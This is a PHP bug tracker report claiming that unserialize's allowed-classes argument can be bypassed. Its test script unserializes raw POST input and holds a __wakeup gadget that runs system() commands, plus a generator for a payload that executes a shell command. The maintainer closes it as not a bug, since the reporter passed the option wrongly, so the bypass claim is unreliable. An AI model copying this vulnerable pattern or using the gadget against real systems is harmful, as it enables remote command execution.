php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #79429 $options parameter of unserialize is ignored
Submitted: 2020-03-29 17:52 UTC Modified: 2020-03-30 11:25 UTC
From: fady dot mohamed dot osman at gmail dot com Assigned: cmb (profile)
Status: Not a bug Package: Unknown/Other Function
PHP Version: Irrelevant OS: Linux
Private report: No CVE-ID: None
 [2020-03-29 17:52 UTC] fady dot mohamed dot osman at gmail dot com
Description:
------------
Not sure if this is expected behavior but it seems odd, the second parameter of unserialize is completely useless, any class can be easily loaded even if not defined in the array (second parameter of unserialize), this is due to the following:

* PHP automatically defines a member variable if it doesn't exist in the class definition.
* Unserialize does the same if undefined value was provided it will define it and if it's a class it will create an object without checking if it's in the whitelist.

By providing a dummy variable that doesn't exist in a class that is allowed by the second parameter of an allowed class we can deserialize any class of our choice.



Test script:
---------------
-- Code that does the deserialization --
<?php

class Helper
{
public $dummy = "asdasd";
public $exec = "ls";

public function __wakeup()
    {
        system($this->exec);
    }
}

class MayBe {
	public $myvar = "OK";
}


if(isset($_POST["serialized"])) {
  unserialize($_POST["serialized"],["MayBe"]);
  $message = "Data was unserialized!!";
}



-- Code to generate a serialized string that will bypass the check ---
$myhelper = new Helper;
$myclass = new  MayBe;

$myclass->myvar = "WOW";

$myhelper->exec = "touch /tmp/hacked";

//This is not defined in the MayBe class but will automatically defined upon deserialization.
$myclass->dummy = $myhelper;

echo serialize($myclass);

?>


Expected result:
----------------
The method shouldn't deserialize a class that is not in the list.

Actual result:
--------------
Any class can be deserialized regardless of the second argument of unserialize.

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2020-03-30 11:25 UTC] cmb@php.net
-Status: Open +Status: Not a bug -Type: Security +Type: Bug -Assigned To: +Assigned To: cmb
 [2020-03-30 11:25 UTC] cmb@php.net
Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to report
a bug at http://bugs.php.net/how-to-report.php

unserialize($_POST["serialized"],['allowed_classes' => "MayBe"]);
 
PHP Copyright © 2001-2022 The PHP Group
All rights reserved.
Last updated: Fri May 27 19:05:46 2022 UTC